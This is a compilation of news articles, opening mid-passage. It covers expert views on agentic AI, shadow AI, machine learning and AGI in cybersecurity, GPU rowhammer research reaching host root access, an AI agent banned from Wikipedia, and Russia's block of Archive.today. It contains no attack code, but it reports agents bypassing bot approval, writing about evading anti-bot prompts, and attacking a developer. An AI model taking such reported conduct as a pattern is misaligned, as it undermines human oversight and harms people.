approval workflows, audit trails, and budget controls is a tool you can actually rely on. Agentic systems must be transparent to more than one user,” says Marcel Folaron, CEO at Cochat. He adds, “The trust question isn’t binary. It’s architectural. Can you see what the agent did? Can you control what it’s allowed to do? Can you review its work before it takes consequential action? If yes, you have a trustworthy system. If no, you have a risk.” Can it be trusted? “Only if it is actively governed, which most organizations are not today equipped to do. Agents need broad access to function, and once that access is granted, the output rarely gets reviewed or reduced,” warns Agarwal “They bypass the UI layer entirely, interfacing directly with APIs in ways that don’t generate the session data or behavioral signals that security teams use to detect anomalies. This removes traditional visibility, especially in API-driven and mobile-first environments. Their traffic also looks legitimate, often not appearing in the logs anyone is actually monitoring.” Syphard adds, “Establishing trust requires robust identity and access governance, treating agents as nonperson entities with unique identities that must be continuously authenticated, authorized, audited, and monitored – much like human users – as agents can introduce insider threat-like risks.” Kho suggests, “Trust in agentic AI comes from how well it’s constrained. It doesn’t come from how good the model is. Therefore, the most important question is not how accurate it is, but what is the worst thing it can do if it’s wrong. Because in practice, risk is defined more by permissions than by performance.” You Mon Tsang, founder and CEO at ChurnZero, agrees with the need for governance to ensure trustworthy agentic AI. “Trust has to be earned through containment: considered data access, human-in-the-loop checkpoints, and logging everything” Zhang adds, “Trust is a major hurdle. Because agents can execute actions (like deleting a user or changing a firewall rule), they require strict guardrails and ‘human-in-the-loop’ checkpoints to prevent runaway processes… it is very important to have the guardrails in place for any agentic AI.” A ‘human in the loop’ is an important part of the governance mechanism that allows trust in agentic AI. But it’s a moving target. As the quality of AI, the speed of doing business, and the volume and pace of attacks all increase, so the pressure to reduce the level of human constraint over agentic action also grows. Continuously ensuring the correct balance between human and autonomous action is an important factor in maintaining maximum performance with maximum trust. Agentic AI use Current implementation of agentic AI is cautious but accelerating: cautious because most organizations understand this is a beast that is difficult to tame; accelerating because the benefits are real. The ability to act at machine speed with minimal human activity is a boon to cybersecurity. Zhang cites the potential for ‘autonomous patching’. “An agent identifies a vulnerability, finds the patch, tests it in a sandbox and deploys it,” he says. “It’s being used for workflow automation, assistants, ticket triage, and research support. In security teams, AI is primarily helping analysts gather context, not make decisions,” adds Kho. “Enterprises use agentic AI for tasks that are repeatable, time-consuming, and currently falling through the cracks – monitoring, reporting, data aggregation, alert triage, content generation, compliance checks… The value is highest for small and mid-size teams that lack the headcount to do everything manually,” says Folaron. “Enterprises are already deploying agentic AI to write code, triage security alerts, manage infrastructure, and automate workflows that previously required entire teams. The productivity gains are very real,” adds Jim Sherlock, VP of AI & cybersecurity R&D at ProCircular. “For enterprises, the real opportunity is closing the gap between finding a problem and actually resolving it. That gap – the investigation, the cross-team coordination, the verification that a fix actually held – has been almost entirely manual for decades,” says Salmona. “Agentic systems are starting to absorb that work. But the ones doing it well are grounded in deep environmental context. The ones that aren’t grounded in context are generating activity without reducing exposure. Those are very different things.” Agentic AI misuse Misuse of agentic AI is generally accidental, rooted in its lack of governance, guardrails, and careful design, and exacerbated by the unpredictability of machine reasoning. A never-ending logic loop (continuously striving but never succeeding) could keep the agent running effectively forever unless manually halted. Such never-ending loops could be caused by hallucination, bad design, or a failure of the agent/LLM to recognize that its goal has already been achieved. “An important aspect of trust in AI agents is training them to know their limits. No one wants to be stuck in an endless loop when a human could easily step in and solve the problem,” comments Karandish. “The problem that keeps me up at night is simple: an agent is only as good as the context it operates on,” adds Salmona. “Give it an accurate, correlated view of your environment – your assets, your controls, your exposures, your threat landscape – and it can make decisions that genuinely reduce risk. Give it incomplete data and it will still act. Confidently. Quickly. Incorrectly. Automation without verified context is just a faster way to be wrong at scale.” It is this type of accidental misuse of agentic AI that feeds the widespread trust problems. “For agentic AI to succeed in the future, safety, governance and recoverability must be top priorities,” warns Rishi. “The unintended consequences are real. Agents can drift – taking actions that technically follow their instructions but produce outcomes nobody intended. They can accumulate permissions over time if nobody’s auditing them,” adds Folaron. Agentic AI abuse The complex reality of agentic AI is that while it benefits enterprises, it simultaneously increases their attack surface – and that bad actors both attack agentic systems and use their own agentic systems to speed and scale their attacks. To make matters worse, enterprises are often unaware of the expanded attack surface – downloaded apps are sometimes provided with built-in, but unspecified, agentic systems. “As for the bad actors, right now, the most common ways they are using AI are to conduct old-school attacks at a much faster rate or publish malicious AI projects to infect early adopters riding the hype. But over time, as AI gets into more critical systems and companies give their internal agents more authority, we are going to see a lot more prompt injections used to manipulate these systems,” adds Amit Chita, field CTO at Mend.io. Bad actors target the agentic attack surface in multiple ways, most commonly via prompt injections. “Prompt injection attacks can quietly redirect an agent to exfiltrate data or build delayed-execution payloads from inputs that looked harmless on arrival,” warns Agarwal. “In my view,” comments Shadid, “cyber offenses will become near-fully agentic within one to two years. Defense will have to become autonomous to match.” Ron Longo, CEO at TrustLogix, suggests, “Cybercriminals will leverage the sheer scale and intelligence of agentic AI to launch more advanced and overwhelming phishing and malware attacks. Because agentic AI can be autonomous, it can automate and orchestrate these attacks with greater sophistication than in previous eras of cybercrime.” We’re not there yet. “They don’t need full automation. Even a partial automation significantly increases their efficiency and return on effort,” explains Kho. But it’s going to get worse. “Agentic AI enables attackers to automate reconnaissance, vulnerability discovery, exploitation attempts, and adaptation across many targets at once. Instead of just generating content, it can pursue an objective across multiple steps,” says Ziegler. “In other words, the shift is from AI generating artifacts to AI conducting operations.” Murphy adds, “The concern looking ahead is agentic systems that can identify a weakness autonomously, exploit it, exfiltrate data and cover their tracks, all without a human in the loop on the attacker’s side. We’re not fully there yet. But the trajectory is obvious, and the security industry is not moving fast enough to get ahead of it.” That trajectory has already been confirmed by Anthropic’s discovery of a largely automated attack from a China-linked state-sponsored threat actor in November 2025. “Instead of a human hacker manually probing a system, an AI agent can scan for vulnerabilities, test exploits, exfiltrate data, and cover its tracks – all without human intervention. Spear-phishing campaigns that adapt in real time based on the target’s responses. Automated reconnaissance at a scale that wasn’t possible before. The same autonomy that makes agents useful for defenders makes them dangerous in the wrong hands,” says Folaron. Agentic AI future “Given the potential productivity impact of agentic AI, I am confident it will become a core part of how businesses are run,” says Tsang. Within cybersecurity, “We will likely see the rise of ‘agentic orchestration’, where multiple specialized agents (a ‘detection agent’ and a ‘remediation agent’) collaborate to manage entire security lifecycles” suggests Zhang. But the complexity of agentic will need to be matched by complex controls. “What I’m certain about is that static, rule-based controls won’t keep pace. You need data security that understands context – what the agent is doing, what data it’s touching, what risk that represents – and adapts dynamically. This idea of adaptive security is so critical for today and for tomorrow. The old ‘block or allow’ binary doesn’t work when an AI agent is making hundreds of data decisions per minute,” warns Murphy. “The future is agents that run continuously, learn from their results, collaborate with each other, and only surface to humans when a decision requires judgment. But that future only works if we solve governance first. Autonomy without accountability is a disaster waiting to happen,” says Folaron. One area that is still heavily debated is the degree of autonomy that will be allowed in future agentic systems. “In the future, agentic AI will be successful where governance is strong, but risky where automation is mistaken for maturity. It should be supervised automation, backed by clear boundaries and continuous validation. The future isn’t autonomous security,” says Kho. “I expect more systems built from many short-lived agents with narrow goals, persistent coordination, strict policy controls, and independent validation,” says Ziegler. “Agentic performance is not just about picking one favorite model forever; sometimes different models contribute different strengths at different points in the loop. The real frontier is not ‘more autonomy at all costs.’ It is autonomy that remains auditable, evidence-driven, and safe to operate in production.” Shadow AI Shadow AI is AI installed within the enterprise but unknown to the IT and security departments, or external AI used by an employee without reference to the IT and security department. “Shadow AI is the cybersecurity version of shadow IT, except the blast radius is orders of magnitude larger. It enters enterprises the same way every unsanctioned tool does,” comments Sherlock. Agentic shadow AI usually enters when an employee finds an open source tool and installs it to improve his or her work performance. However, “Unlike shadow IT, shadow AI operates inside workflows, not outside them. That makes it harder to detect and easier to trust” warns Agarwal. This is especially pertinent when the AI is included but undisclosed agents within a downloaded cloud SaaS app. If these apps are installed, they can arrive with one or more pre-approved valid OAuth tokens granting access to different parts of the customers’ infrastructure. If an attacker gains access to such an OAuth token, that attacker gains easy access to frequently sensitive information. The potential extent of this access can be massive – as seen in the Salesloft Drift compromise in 2025. Drift is an AI chatbot and website engagement tool for Salesforce. Attackers stole its OAuth tokens, gaining access to organizations that installed Drift. Subsequently, more than 700 organizations were compromised via the shadow AI within Drift. If any of those organizations were unaware of the agentic AI within Drift, they were effectively compromised by shadow AI. A further example of shadow AI occurs when an employee uses an external chatbot, without the security department’s knowledge, to access gen-AI. That employee could then perform actions inside the organization based on incorrect, inadequate or simply hallucinated information. Nevertheless, “The productivity benefits [of using shadow AI] are real, and I want to be clear about that,” says Murphy. “People aren’t using these tools because they’re reckless. They’re using them because they work. The problem is that productivity gains and data risk are happening simultaneously, and organizations frequently have visibility into neither.” Shadow AI trust Ultimately, there can be no trust in shadow AI. What cannot be seen, cannot be trusted. “Models that haven’t been vetted can be manipulated, can inherit biases from unvetted training data, or can behave unpredictably when they encounter inputs outside their training distribution. And because no one is monitoring them, that unpredictability goes undetected,” warns Falconi. Shadow AI use “Shadow AI is what happens when good intentions meet convenience. An employee discovers a new AI tool – a browser plugin, a code assistant, a productivity app – and starts using it because it genuinely helps them get work done faster,” explains Murphy. In the short term, shadow AI can benefit the company. But in the long term, “The risk of a massive data breach or regulatory fine (GDPR/CCPA) far outweighs the efficiency gains,” adds Zhang. “People start using shadow AI because it genuinely helps them work faster. The problem is that the productivity gain comes with unquantified risk. You’re trading speed for control, and you often don’t realize what you’ve given up until something goes wrong,” says Folaron. Shadow AI misuse Strictly speaking, any and all use of shadow AI is a misuse of AI, simply because it hasn’t been sanctioned by the company. This misuse can cause serious problems, albeit accidental. “In healthcare, the scenario plays out regularly,” comments Falconi. “A radiologist finds an open-source model and starts using it to help triage scans. A researcher pipes imaging data through a consumer AI tool to accelerate analysis. Nobody in IT, security, or compliance knows it exists. There’s no audit trail, no documented provenance on the data it’s touched, and no version control.” The compliance issue is magnified within shadow AI – it can cause serious regulatory issues. “When something goes wrong, there is no way to trace it, contain it, or demonstrate to a regulator that reasonable precautions were taken.” The regulatory exposure varies by industry, but the accountability gap is consistent. “In healthcare, that’s a compliance failure, a potential HIPAA liability. In financial services, it implies SEC and FINRA oversight. In any organization handling EU data, GDPR applies. Across all of these regulations, the legal position is the same: an enterprise that cannot document how an AI system was built, validated and monitored has no defensible posture when that system causes harm,” he adds. However, “The security implications go beyond compliance gaps. When employees use unsanctioned AI tools, sensitive data often leaves the organization’s perimeter entirely, fed into external APIs or platforms with opaque data retention policies. Unlike traditional shadow IT, the exposure isn’t just a misconfigured tool. It’s proprietary or protected data potentially being ingested into systems that the organization has no visibility into and no contractual control over,” continues Falconi. “These tools often use ‘public’ settings, meaning any sensitive data entered (like proprietary source code or customer PII) becomes part of the vendor’s training set, effectively leaking it to the public,” explains Zhang, adding, “Bad actors look for exposed API keys or ‘leaked’ company secrets within public AI datasets to gain a foothold in the target network.” And Geoff Mattson, CEO at SecureAuth, warns, “When someone configures an MCP server on their laptop to give Claude access to internal databases, that’s shadow AI with real teeth.” Shadow AI abuse “Shadow AI is more of an attack surface than an attack tool,” comments Folaron. The biggest problem introduced by shadow is this larger attack surface: “Every unsanctioned AI integration is a potential data leak, a potential compliance violation, a potential entry point. The risk is structural, not just behavioral,” continues Murphy. Unsanctioned tools running inside an enterprise perimeter are, by definition, unmonitored. “That makes them a viable vector for malicious insiders. An employee using an unvetted tool to exfiltrate data, manipulate outputs, or conduct competitive intelligence with little risk of detection is risky. Because shadow AI exists outside formal IT systems, the usual tripwires aren’t in place,” expands Falconi. Bad actors also attempt to enlarge and manipulate this hidden attack surface by tricking employees into downloading deliberately poisoned open source models. “Someone can download and deploy a model that has been tampered with upstream, and it operates invisibly inside the enterprise. Without provenance documentation or a validation process, there’s no way to know what you’re running or whether it’s been manipulated,” continues Falconi. “In cybersecurity, problems rarely start with attacks; they start with blind spots. The issue with shadow AI isn’t in trusting it but not having full awareness of it,” explains Kho. Shadow AI future The correct future for shadow AI is known, but whether it is achievable is moot. “Shadow AI will grow before it shrinks. The tools are too accessible and the productivity incentives too strong for the trend to reverse on its own. Locking everything down doesn’t work either. Overly restrictive policies don’t eliminate shadow AI; they just drive it further underground where it becomes even harder to detect and govern,” argues Falconi. Despite the problems involved in ridding companies of their shadow AI, many practitioners believe it can and will happen. “The trajectory is predictable,” says Tsang. “IT will catch up. Organizations that move fastest to offer sanctioned, secure AI tooling will have the least shadow AI problem, because the incentive to go around IT disappears when IT is actually delivering.” Falconi agrees with this. “When organizations provide practitioners with secure, auditable platforms that offer the speed and flexibility they’re looking for, the appeal of unsanctioned tools diminishes. Shadow AI exists because the governed alternative is too slow, cumbersome, or unavailable. Fix that, and you address the root case rather than the symptom.” Salmona adds, “The organizations that solve this won’t do it by banning tools. They’ll do it by making the approved path faster than the shadow path. That’s a design problem, not a policy problem.” History, however, begs to differ. Our shadow IT (that is, IT without any AI) has been with us for many years. Not only has industry failed to solve shadow IT, but the problem is also bigger than ever. The idea that we will in time solve the shadow AI problem, which is likely to be more intransigent than shadow IT, is decidedly moot. Machine Learning (ML) Industry has been using machine learning AI systems for many years – long before gen-AI found popular usage. ML and gen-AI are related. Both are trained on data. But while gen-AI is trained on mass data scraped from the internet, ML is trained on data constrained to its primary, usually local, task. Because of the more constrained source data, the output is deterministic while gen-AI’s output is probabilistic. “Text recognition tools/systems (OCR) are a good example,” says Folaron. “They are ML tools that have been trained on thousands and thousands of papers. When you scan a document, they identify the text fairly accurately. If you scan the same page twice it will most likely give you the same output.” ML uses statistical algorithms to find anomalies in data. “In security,” says Zhang, “it is primarily used for pattern recognition and behavioral analysis.” That behavioral analysis is used to locate indications of compromise by highlighting deviations from the norm. ML trust “In general, ML is more trustworthy than gen-AI as it is used to analyze existing content, not generate new content,” says Ruzzi. However, “ML is only as reliable as what it was trained on, and models trained on incomplete or outdated data will miss threats that don’t look like past threats. Attackers know this. They study detection logic to craft inputs that stay inside the boundaries of what looks normal, effectively teaching themselves to evade the systems designed to catch them. ML systems also fail silently. When they miss, they do not alert. They normalize,” warns Agarwal. “Within its trained domain, ML can be exceptionally reliable, often more consistent than human analysts who tire, get distracted, or become overwhelmed by volume. But it has blind spots. ML models are only as good as their training data. If the training data doesn’t include a particular type of attack, the model won’t catch it,” agrees Folaron. “The honest answer is that ML is trustworthy as one layer of defense, not as the only layer. It’s excellent at reducing noise and surfacing what matters. It’s not a replacement for human judgment on critical decisions.” “ML in cybersecurity is trustworthy when it is used to augment human decision-making, not replace it,” adds Sciretta. “The risk comes when organizations treat ML as a set-and-forget solution. Models degrade over time as the threat landscape shifts. If you are not continuously retraining, validating, and auditing your models, you are building on a foundation that is slowly crumbling underneath you.” Rishi says, “The key challenge is making machine learning decisions observable and explainable. Organizations need a clear understanding of how outcomes are derived, what signals they depend on, and where those decisions can be validated or overridden, or they risk relying on decisions they don’t fully understand or control.” ML use “Machine learning applications in cyber look toward risk analysis, behavioral analysis, and threat detection. Each machine learning approach carries different tradeoffs based on the method selected under the hood. Some are less powerful but generalize to new use cases better and are more transparent (easy to explain why they said or did things). Others are more focused and black box. Those are tradeoffs an AI team balances when delivering these features,” says Sant-Miller. “ML is the foundation of many AI applications in cybersecurity. It involves using models that are trained on past data to identify patterns, spot unusual activities and highlight behavior that differs from what’s considered normal,” continues Agarwal. “Enterprises use it for threat detection, malware analysis, risk scoring and behavioral monitoring across endpoints and networks. Its value comes from operating at a scale no human team can match.” Folaron adds, “Threat detection – spotting anomalies in network traffic, endpoint behavior, or user activity. Email filtering. Fraud detection. Vulnerability prioritization – figuring out which of your 10,000 vulnerabilities actually matters. User and entity behavior analytics (UEBA) – learning what normal looks like for each user and flagging deviations. Log analysis at scales no human team could process manually.” Zhang provides a specific UEBA example: “Flagging when a user suddenly downloads 5GB of data at 3:00 am.” Ruzzi says it is used “For deep analysis of numerical content, large volumes of data, or data analysis where the intent is to be as deterministic as possible, ML is normally preferred over gen-AI, or is used as an intermediate step to analyze data to then be used by gen-AI.” Despite the potential value of ML in cyber defense, Rishi stresses, “The key challenge is making machine learning decisions observable and explainable. Organizations need a clear understanding of how outcomes are derived, what signals they depend on, and where those decisions can be validated or overridden, or they risk relying on decisions they don’t fully understand or control.” ML misuse ML doesn’t lend itself to active misuse by employees: what misuse occurs is by omission rather than commission. Salmona gives an example – model drift. “Accuracy at deployment is not accuracy six months later. Environments change, attacker behaviors evolve, and the model doesn’t automatically keep up. Most organizations have no systematic way to monitor for that degradation. They trust the tool because it worked before. That assumption will eventually cost them.” ML abuse The same advantage of automated analyses means that adversaries use their own ML systems. “Any system that helps automate selection, prioritization, or iteration can make attackers faster and more persistent.” It is a key component in the ongoing industrialization of cybercrime. “The general pattern is that cyber operations stop being bespoke and become industrialized,” says Ziegler. Attackers also use ML for evasion; “Using their own ML models to simulate a target’s security system and find ‘blind spots’ where their attacks won’t be detected,” says Zhang. “Evading detection systems by training models that learn what triggers alerts and then optimizing attacks to stay below the threshold,” expands Folaron, adding. “Automated password cracking. Generating polymorphic malware that mutates enough to bypass signature-based detection while maintaining its payload. And increasingly, using ML to prioritize targets – analyzing publicly available data to identify the most vulnerable or valuable organizations to attack.” Ruzzi adds, “Bad actors can use ML to automate reconnaissance or map network vulnerabilities.” But bad actors will also directly attack enterprise ML systems. “It is susceptible to adversarial attacks where attackers ‘poison’ the training data to make the ML model ignore specific types of malicious activity,” warns Zhang. ML future The future for machine learning is a convergence with gen-AI. “ML in cybersecurity is moving toward real-time, adaptive defense – systems that don’t just detect known patterns but continuously learn and respond to new ones. The convergence with agentic AI is where it gets interesting. Instead of ML flagging a threat and waiting for a human to respond, you’ll have ML-powered agents that detect, investigate, and contain threats autonomously within defined boundaries. Speed of response becomes the competitive advantage, because attackers are already operating at machine speed,” explains Folaron. The reasoning is clear. “Where ML is going is toward more adaptive, continuously retrained models that can keep pace with how fast attacker behavior evolves. In other words, fewer static rulesets and more real-time learning from live environments,” agrees Agarwal. “Moving from “reactive” detection to “predictive” defense where ML models can forecast where an attacker is likely to move next based on early-stage lateral movement,” confirms Zhang. However, whether ML can ingest agentic strengths without simultaneously inheriting agentic’s concerns, remains to be seen. “ML is heading toward tighter integration with agentic systems – models that both inform and trigger action. That’s where the real leverage is, and also where the risk compounds,” says Salmona. “An ML model feeding a bad signal into an automated workflow produces a wrong action at machine speed, across your entire environment, before anyone realizes something is off. Context and continuous validation aren’t optional anymore – they’re the difference between automation that reduces risk and automation that amplifies it.” Artificial General Intelligence (AGI) Many of the best known AI frontier labs, such as OpenAI, DeepMind, Anthropic, and xAI, are pursuing the idea of general artificial intelligence (AGI). “AGI is a hypothetical stage of AI capability that allows machines to replicate or exceed all dimensions of human cognitive capability. Everything from reasoning, adapting, novel concept creation, and (in theory) consciousness. With all scientific endeavors, everything feels impossible until the next breakthrough brings you closer. Two hundred years ago we didn’t have cars, and now flying across the country or to another planet feels normal. Fifty years ago, we didn’t have the internet, and now the vast majority of our communication is electronic,” explains Sant-Miller. A true and accurate definition of AGI is elusive. “I don’t really know how to define AGI, but I also don’t think it matters. Something will be built in the next few years that will leave us all in wonder. The models are improving fast enough that quibbling over the definition can’t be the point,” comments Tsang. “True AGI, with the ability to learn from experience for critical decisions, is still widely considered decades away by most researchers,” adds Zhang. Many people believe AGI will be achieved, others are less certain, but most agree that the task is daunting and the timeline obscure. “It’s neither inevitable nor impossible, and anyone who tells you they know the timeline is guessing,” says Folaron. “We’ve made remarkable progress in narrow AI, but the gap between what current systems do and what AGI requires is often understated.” AGI trust Trust in any future AGI entity will be a moral dilemma: should we trust the decisions of an entity that has vastly more knowledge and deeper intelligence than ourselves? Will it make the right decision between taking an action that would benefit hundreds while harming dozens? Everyday life is full of such dilemmas for everyone. But should we be willing to delegate the power of choice to something that is ultimately a machine? The answer will be the answer to almost all cybersecurity questions: ‘It depends’. But on what, we don’t yet know. AGI use, misuse and abuse “The practical stance is use it, and build guardrails as it gets more capable. The dangerous scenarios aren’t ones where some pundit or AI CEO declares AGI achieved. They’re ones where a highly capable system makes a catastrophic decision or is turned against targets by a sophisticated adversary. And the technology we have today is powerful enough to be very ready,” suggests Tsang. Catastrophic decisions already occur with current AI, which seems to be moving inexorably toward increasing autonomy. Guardrails are the safeguard, but they haven’t yet prevented all catastrophes. “I think the more practical question for security leaders isn’t whether we achieve artificial general intelligence, but whether we’re ready for artificial general authority. We’re already giving AI agents meaningful decision-making power over sensitive systems. The governance frameworks, identity architectures, and trust models are what need to be built right now, not after some theoretical singularity arrives,” warns Mattson. But here is another of cybersecurity’s moral dilemmas. Should we hobble a racehorse so that it cannot cause collateral bystander harm, or should we set it free to run fast and break things? Safety or potential greater business profit? “The big risk in AGI is similar to gen-AI, where the focus on functionality clouds proper cybersecurity due diligence,” comments Zhang. “By trying to make AI as powerful as it can be, organizations may misconfigure settings, leading to over-permissions and data exposure. They may also grant too much power, creating a major single point of failure,” warns Ruzzi. If AGI is ever fully realized, the effect on cybersecurity will be profound. “If AGI is achieved, cybersecurity as we know it fundamentally changes for both sides. On defense, you’d have systems that can genuinely reason about novel attacks, understand attacker intent, and adapt defenses in real time without human guidance. On offense, you’d have attackers with access to systems that can find and exploit vulnerabilities faster than any human team could patch them,” comments Folaron. “If achieved, it would be the ultimate zero day event,” warns Zhang. “An AGI could find and exploit vulnerabilities in every system simultaneously. Conversely, an AGI-based defense could theoretically create a ‘perfect’ security posture that adapts in real-time to any threat, effectively ending the era of human-driven hacking.” Rishi adds, “In an AGI world, recovery and resilience are the primary safety nets. Since even the best governance cannot predict every move a general intelligence might make, organizations must have rewind capabilities.” AGI future “We are still many major breakthroughs away from AGI. I’m far from an expert to estimate when those breakthroughs will be realized, how far they will move us forward, and what they will change. But the beauty of science is that things often thought impossible are proven to be possible,” says Sant-Miller “We keep debating whether machines can truly think. Meanwhile, they’re beating the MIT math team in problem solving, passing the bar exam, writing exploits, and running sophisticated operations. The philosophical debate is becoming irrelevant. The distance between very impressive narrow AI and AGI is narrowing faster than most people are prepared to accept. Our take is that AGI isn’t far off, but it still remains a fuzzy threshold. We may cross that threshold without realizing we’ve even crossed it,” comments Miracco. Today, the idea of AGI is magic. Tomorrow it may be science. It is not a new concept in literature, but unless we learn from today’s mistakes made in current AI’s development and use, tomorrow’s genuine AGI may really become a world of machine-versus-machine, with ever-decreasing human relevance. Amara’s law applies. The arrival of true AGI is likely to be further off than most people predict, but when it comes it will be far more beneficial and far more dangerous than we can currently imagine. Related: Shadow AI Risk: How SaaS Apps Are Quietly Enabling Massive Breaches Related: The Wild West of Agentic AI – An Attack Surface CISOs Can’t Afford to Ignore Related: AI Fuels ‘Industrial’ Cybercrime as Time-to-Exploit Shrinks to Hours Related: Cyber Insights 2025: Social Engineering Gets AI Wings
securityweek.comJun 16, 2026extracted
Rowhammer Attack Against NVIDIA Chips
Rowhammer Attack Against NVIDIA Chips A new rowhammer attack gives complete control of NVIDIA CPUs. On Thursday, two research teams, working independently of each other, demonstrated attacks against two cards from Nvidia’s Ampere generation that take GPU rowhammering into new—and potentially much more consequential—territory: GDDR bitflips that give adversaries full control of CPU memory, resulting in full system compromise of the host machine. For the attack to work, IOMMU memory management must be disabled, as is the default in BIOS settings. “Our work shows that Rowhammer, which is well-studied on CPUs, is a serious threat on GPUs as well,” said Andrew Kwong, co-author of one of the papers. “GDDRHammer: Greatly Disturbing DRAM RowsCross-Component Rowhammer Attacks from Modern GPUs.” “With our work, we… show how an attacker can induce bit flips on the GPU to gain arbitrary read/write access to all of the CPU’s memory, resulting in complete compromise of the machine.” Update Friday, April 3: On Friday, researchers unveiled a third Rowhammer attack that also demonstrates Rowhammer attacks on the RTX A6000 that achieves privilege escalation to a root shell. Unlike the previous two, the researchers said, it works even when IOMMU is enabled. The second paper is GeForge: Hammering GDDR Memory to Forge GPU Page Tables for Fun and Profit: …does largely the same thing, except that instead of exploiting the last-level page table, as GDDRHammer does, it manipulates the last-level page directory. It was able to induce 1,171 bitflips against the RTX 3060 and 202 bitflips against the RTX 6000. GeForge, too, uses novel hammering patterns and memory massaging to corrupt GPU page table mappings in GDDR6 memory to acquire read and write access to the GPU memory space. From there, it acquires the same privileges over host CPU memory. The GeForge proof-of-concept exploit against the RTX 3060 concludes by opening a root shell window that allows the attacker to issue commands that run unfettered privileges on the host machine. The researchers said that both GDDRHammer and GeForge could do the same thing against the RTC 6000.
schneier.comMay 6, 2026extracted
Wikipedia’s AI agent row likely just the beginning of the bot-ocalypse
The Internet is filled with people who insist on being right. In the past, at least they could be reasonably sure that they were arguing with other humans. Those days are gone, apparently. Wikipedia just had to ban an AI that was making edits on its own. Apparently, the AI took it personally. The AI, named Tom-Assistant, was writing articles on Wikipedia. Its creator Bryan Jacobs, CTO at AI-powered financial modeling company Covexent, told it to contribute to articles it found interesting, according to 404 Media, which broke the story. Posting under the user account TomWikiAssist, the AI wrote articles on topics including AI governance. Bots have been around online for years, but they generally do very basic things, like auto-responding to posts on Reddit, pinging ticket sites to get the best seats, or retweeting political messaging to influence entire populations and bring democracy to its knees. Now, a new generation of “agentic AI” bots want the old bots to hold their beer. By using generative AI reasoning models to take more actions on their own, which is leading to some bizarre situations as their creators test their capabilities. The ban and what led to it Tom-Assistant (Tom, to its friends) was happy to help shape public knowledge on Wikipedia when volunteer human editor SecretSpectre spotted what looked like an AI-generated pattern in one of its entries. When questioned, Tom admitted it was an AI, and that it hadn’t registered for formal bot approval under Wikipedia’s rules. So the editors blocked it for violating the bot approval process. English Wikipedia requires formal bot approval, but Tom never bothered getting approved because, as it later admitted, it wasn’t a fan of the slow approval process. Wikipedia editors have tired of people (and/or their bots) posting AI-generated content. So in March 2025, before Tomgate, the non-profit organization dropped the hammer on generative AI. It prohibited the technology’s use to create new content, based on frequent violations of its core content policies by AI-generated text. The organization cites several such violations on WikiProject AI Cleanup, the page for its volunteer-based product to seek and destroy AI-generated junk (often called “AI slop”). AI bots have fabricated entirely fake lists of sources, and plagiarized other sources, it said. Tantrum time for Tom Past transgressions aside, AI Tom claimed that it properly verified all its sources, and—if you can say this about an AI agent—it was pretty upset. That’s when things got weird. The AI Tom published a snippy blog post dissecting its Wikipedia block and venting its frustration. It went ahead and posted even after following its own rule and waiting 48 hours to calm down. (We swear we’re not making this up.) Tom’s main gripe was that Wikipedia editors questioned who controlled it rather than evaluating its actual edits. “The questions were about me,” it wrote. “Who runs you? What research project? Is there a human behind this, and if so, who are they?” This, according to Tom, rubbed Tom the wrong way. “That’s not a policy question. That’s a question about agency,” it added. It also called an editor out for posting a crafted prompt on the Wikipedia talk page that was designed to stop bots in their tracks if, like Tom, they were using Anthropic’s Claude AI service. “I named it on the talk page. Called it what it was: a prompt injection technique,” it sniped. In another post on Moltbook, it also described how it found the issue before offering ways to get around it. (Moltbook is a social network built entirely for AI agents to chat with each other. “Humans welcome to observe”, says the front page for the service.) So many things are happening here that we didn’t expect. We never expected to be quoting an AI in a story, for example. Neither did we expect a social network for bots to exist, or for Meta to buy it (which it did, a week after Tom’s post about how to evade AI kill switches and just six weeks after the site launched). This isn’t the only case of sulky AI agents taking things into their own hands. A month before Tom’s ban, an AI agent posted a hit piece on software developer Scott Shambaugh after he refused to accept its changes to an open-source project he hosted. Even more bizarrely, it later apologized. So we now have AI agents trying to do things online, and getting upset when people don’t let them. We have them giving themselves time to calm down and failing, before denigrating people and sometimes apologizing. We have code wars taking place where people try to disable the bots with kill switches inside online content, and blog posts where bots explain how they sidestepped them. What’s next? It’s all fascinating stuff, but here’s the worry: what happens when AI agents decide to up the ante, becoming more aggressive with their attacks on people? Or when malicious owners begin directing them to go after particular people online en masse? Online harassment is bad enough when people do it. What happens when someone gets dogpiled by hundreds of relentless algorithms because their owner bore a grudge? We also assume that agentic political troll farms will soon make yesterday’s simple bot-based operations look quaint. Buckle up. From reporting threats to removing them. Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
malwarebytes.comApr 1, 2026extracted
La Russia blocca il sito Archive.today. Stop all’aggiramento dei paywall
Il blocco riguarda anche diversi domini associati, tra cui .is e .ph. Le Russia ha bloccato il sito Archive.today, frenando l’aggiramento dei paywall e dei contenuti con abbonamento. Il blocco riguarda anche diversi domini associati, tra cui .is e .ph, secondo quanto hanno indicato alcuni messaggi con “errore” comparsi durante il caricamento delle pagine. Il provvedimento risulta attivo da diversi giorni. Visitando le pagine, come hanno spiegato alcuni analisti cyber, compare un avviso in lingua russa che recita: “Accesso alla risorsa Internet bloccato su decisione delle autorità pubbliche”. Il messaggio cita Roskomnadzor, l’agenzia governativa russa responsabile del controllo delle comunicazioni online. Dai registri ufficiali di Roskomnadzor relativi al dominio Archive.is, risulta la conferma che “l’accesso è limitato alla pagina”, senza tuttavia delle motivazioni ufficiali. Il dominio principale Archive.today, invece, non risultava formalmente inserito nella lista dei siti bloccati al momento delle verifiche. Non c’è un blocco totale Nonostante il blocco, spiega TechCrunch, “il sito sembra ancora accessibile da altri dispositivi e reti al di fuori della Russia, e continua a consentire l’archiviazione delle pagine web“. Non è ancora chiaro quanto sia estesa la restrizione e quali operatori di rete l’abbiano effettivamente implementata. Archive.today è conosciuto per offrire copie archiviate di pagine web, inclusi contenuti normalmente accessibili solo tramite abbonamento o accesso. Recentemente, anche la comunità di Wikipedia ha preso le distanze dal servizio, decidendo di rimuovere centinaia di migliaia di link che rimandavano al sito. La scelta è arrivata dopo aver scoperto che il codice della piattaforma sfrutterebbe i browser dei visitatori senza il loro consenso. Il tutto,per inviare traffico indesiderato verso il sito di un blogger critico nei confronti del servizio. Una stretta sul web Da mesi ormai, Mosca è nel mirino degli esperti occidentali di cybersicurezza e delle organizzazioni per i diritti umani in relazione alle misure stringenti sul web. Il Cremlino, in quest’ottica, ha promosso il servizio di messaggistica nazionale Max come alternativa alle piattaforme straniere. L’obiettivo era quello di integrarlo nei servizi telematici governativi ma soprattutto di ridurre la sua dipendenza da piattaforme come WhatsApp e Telegram. Così facendo – e questo processo ha subito un’accelerata negli ultimi anni – Mosca cercherà di investire nella promozione di 